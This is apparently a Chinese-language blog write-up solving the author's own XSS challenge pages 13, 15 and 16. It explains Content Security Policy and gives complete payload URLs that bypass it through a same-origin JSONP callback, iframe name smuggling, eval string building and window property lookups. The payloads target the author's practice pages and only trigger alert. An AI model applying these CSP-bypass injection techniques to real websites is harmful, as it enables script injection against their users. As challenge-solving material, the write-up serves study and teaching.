一些BAT的XSS实例（八）CSP篇

前言

之前发了《一些BAT的XSS实例》系列的6篇技术文章，很多朋友表示看的意犹未尽，问我还有没有续集。刚好最近gainover和香草发了我了几个题说挺有意思，我就去试了试，结果一道都没做出来。后来看了答案后，感觉的确很有意思，所以将题目部分做了下修改，来作为该系列的续集，进行下思路的分享。
先把设计的几个题目发出来

http://px1624.sinaapp.com/test/xsstest13/  
http://px1624.sinaapp.com/test/xsstest14/   
http://px1624.sinaapp.com/test/xsstest15/  
http://px1624.sinaapp.com/test/xsstest16/

其中14题是gainover设计的那个原题，在上一篇《一些BAT的XSS实例（七）技巧篇》已经做了非常详细的技术讲解和剖析。

另外3个题是，根据香草设计的题的解题思路，做了些改动，上篇中在分析13题的时候，也提到了这里主要是考的CSP的相关知识。

有兴趣的朋友，可以先不看文章，自己尝试的做一做题目，有答案的话可以发到我的邮箱 px1624@qq.com 并附上自己的ID，说不定下篇文章里面就会有你的绕过思路被收录了额。

首先是13题，先看下源码。

上一篇《一些BAT的XSS实例（七）技巧篇》中，已经进行了一定的分析，前面相关的重叠部分，这里就不在详细叙述了。
下面继续说思路，从这个px.js的源码中我们可以发现，需要传入的参数是sss，所以我们给url传个sss参数进去。

发现貌似什么都没有过滤，那么传个xss代码进去试试。

发现不管怎么写，代码都可以直接写进去，但是就是不弹窗。很多人可能就会很郁闷，这什么bug啊，明明写进去了，但是为什么就是不执行，这时候可能就很奇怪了，Why?

我们还是去看下控制台的报错信息吧：

其实是因为我设计题目的时候，在服务器端部署了CSP规则，这也就是题目的第二个考点，什么是CSP，可以百度了解下。
也可以参考这里：https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP
或者这里：http://www.ruanyifeng.com/blog/2016/09/csp.html

也就是说有了这个限制，这里的脚本就只能加载当前域名的资源，其他外部资源，以及内联脚本，以及onxxx这种就全部不能用了。这也就是为什么上面的情况，明明看着是写入了脚本代码，但是却无法执行的原因了。

那么有人会问，我怎么看这里是不是有部署CSP规则？

CSP规则的部署一般有3个位置，一个是meta标签里。像下图这样

还有一种是在iframe标签里，像这样

还有一种是在php端部署的，我这个题就是在php端写的。

php端写的这种CSP规则，直接源码是看不到的，可以去抓包在返回数据的header头中看到。

上面原理讲明白了，下面就继续看下这个题怎么去解吧。原理也说的很明白，部署了这个CSP，就只能去加载当前域名的资源，那么我们就需要找一个当前域名的资源去加载。现在再想想一开始跳转过去的那个地址，不是可以写入任意7位字符么，这不就是一个当前域名的可控资源么。

所以构造下代码如下：

http://px1624.sinaapp.com/test/xsstest13/?sss=111%3Cscript%20src=px.php?callback=alert()%3E%3C/script%3E

成功弹窗，但是这里要求alert(13)才行，这样就超出7个字符了，怎么办？

是不是想到了第六题的那个思路了。

但是其实这样是不行的，因为这里并没有用jq。但是其实这个问题也不难解决，我们可以写入2个script标签去构造。具体构造后的payload如下：

http://px1624.sinaapp.com/test/xsstest13/?sss=111%3Cscript%20src=px.php?callback=a=alert%3E%3C/script%3E%3Cscript%20src=px.php?callback=a(13)%3E%3C/script%3E

如果上面内容都消化掉了，下面接着再看看第15题。

15题是13题的升级，字符长度从7个字符限制到了6个字符，但是CSP规则放开了eval的使用，其他代码都是一样的。

这样的限制会导致的问题就是，上面的方法不能用了。因为a=alert 这样是7个字符，那么就要寻找别的方法，这里给出了eval，所以思路是拼接后赋值，这个技巧在前面的相关技术文章中也有提到过。

用这样的思路，答案也就比较多样了，这里给出几个答案。

<iframe name='alert(15)' src='http://px1624.sinaapp.com/test/xsstest15/?sss=%3Cscript+src=%22px.php?callback=a=eval%22%3E%3C/script%3E%3Cscript+src=%22px.php?callback=b=name%22%3E%3C/script%3E%3Cscript+src=%22px.php?callback=a(b)%22%3E%3C/script%3E'></iframe>

这里用iframe嵌套，然后引入name去全局变量去中转，最终等于执行了eval(name)代码，然后name中可以写入任意字符串。

http://px1624.sinaapp.com/test/xsstest15/?sss=11%%3Cscript/src=px.php?callback=a=`al`%3E%3C/script%3E%3Cscript/src=px.php?callback=b=`er`%3E%3C/script%3E%3Cscript/src=px.php?callback=c=`t(`%3E%3C/script%3E%3Cscript/src=px.php?callback=d=`15`%3E%3C/script%3E%3Cscript/src=px.php?callback=e=`)`%3E%3C/script%3E%3Cscript/src=px.php?callback=f=a%252Bb%3E%3C/script%3E%3Cscript/src=px.php?callback=g=c%252Bd%3E%3C/script%3E%3Cscript/src=px.php?callback=h=f%252Bg%3E%3C/script%3E%3Cscript/src=px.php?callback=i=h%252Be%3E%3C/script%3E%3Cscript/src=px.php?callback=j=eval%3E%3C/script%3E%3Cscript/src=px.php?callback=c=j(i)%3E%3C/script%3E

这个思路就是一步步的赋值，拼接出一个"alert(15)"字符串，最终在eval执行。这里需要注意的是 + 加号这个需要url编码2次，因为一次是在浏览器的url里，一次是在script的src这里，所以需要编码2次才行。

如果上面内容都消化掉了，就接着再看第16题。

16题是13题和15题的升级，字符长度限制到了6个字符，而且CSP规则不允许使用eval，其他代码都是一样的。

这样的话，由于字符长度的问题，13题的方法就不行了，由于不能用eval，15题的方法也就不行了。所以需要有一个新的构造思路，首先要确定下思路，就是怎么样通过构造变形，将字符串变为函数，如果这点解决不了，那么这题就没办法推进了，如果你只知道eval这类方法，那么这个题基本上就到此为止了。

那么具体怎么在不用eval的情况下，把字符串变为函数呢，这里给出几种方法，思路都是一样的。

这样的方法，可以将alert函数给构造出来，具体自己去试试就知道了。

所以我们的构造思路是这样，先赋值a=this 然后拼接"alert"字符串，一边拼接一边赋值，最终达到b="alert"字符串的效果，然后c=a[b] 这样c就是alert函数了，最后执行c(16)即可。

这里给出几个paylod思路

<iframe name='alert' src='http://px1624.sinaapp.com/test/xsstest16/?sss=%3Cscript+src=%22px.php?callback=a=name%22%3E%3C/script%3E%3Cscript+src=%22px.php?callback=b=this%22%3E%3C/script%3E%3Cscript+src=%22px.php?callback=c=b[a]%22%3E%3C/script%3E%3Cscript+src=%22px.php?callback=c(16)%22%3E%3C/script%3E'></iframe>

http://px1624.sinaapp.com/test/xsstest16/?sss=%3Cscript+src=%22px.php?callback=a=%27al%27%22%3E%3C/script%3E%3Cscript+src=%22px.php?callback=a%252b=%27e%27%22%3E%3C/script%3E%3Cscript+src=%22px.php?callback=a%252b=%27r%27%22%3E%3C/script%3E%3Cscript+src=%22px.php?callback=a%252b=%27t%27%22%3E%3C/script%3E%3Cscript+src=%22px.php?callback=b=self%22%3E%3C/script%3E%3Cscript+src=%22px.php?callback=c=b[a]%22%3E%3C/script%3E%3Cscript+src=%22px.php?callback=c`16`%22%3E%3C/script%3E

这里再抛出一个问题，如果16题这里要求必须调用外部js文件才算通过的话，有没有办法实现呢？？
其实也是可以的，具体有兴趣的可以自己试试。

总结：
通过这几个案例可以看到，在我们的解法思路中，用到了CSP规则的相关知识、字符长度限制的构造技巧、字符串变函数的一些方法等。
可以看到，其实主要还是思路要对，同时基础知识要过硬，这样才能在XSS漏洞这方面做到“人挡杀人，佛挡杀佛”的操作。

尾巴：
截至发稿前，仅有几个人给出了部分答案，ID分别是：

香草、Huuuuu、gainover、evil7

当然，所有1~16题的构造思路并非唯一，也可欢迎其他人将自己更好更有意思的答案，发到我的邮箱 px1624@qq.com 并附上自己的ID，说不定下篇文章里面就会有你的绕过思路被收录了额。

目前共设计有16道题，修改下方链接的xsstest1为xsstest1~xsstest16即可。
http://px1624.sinaapp.com/test/xsstest1/

最后发下个人的纯技术交流的 公众号：不忘初心px1624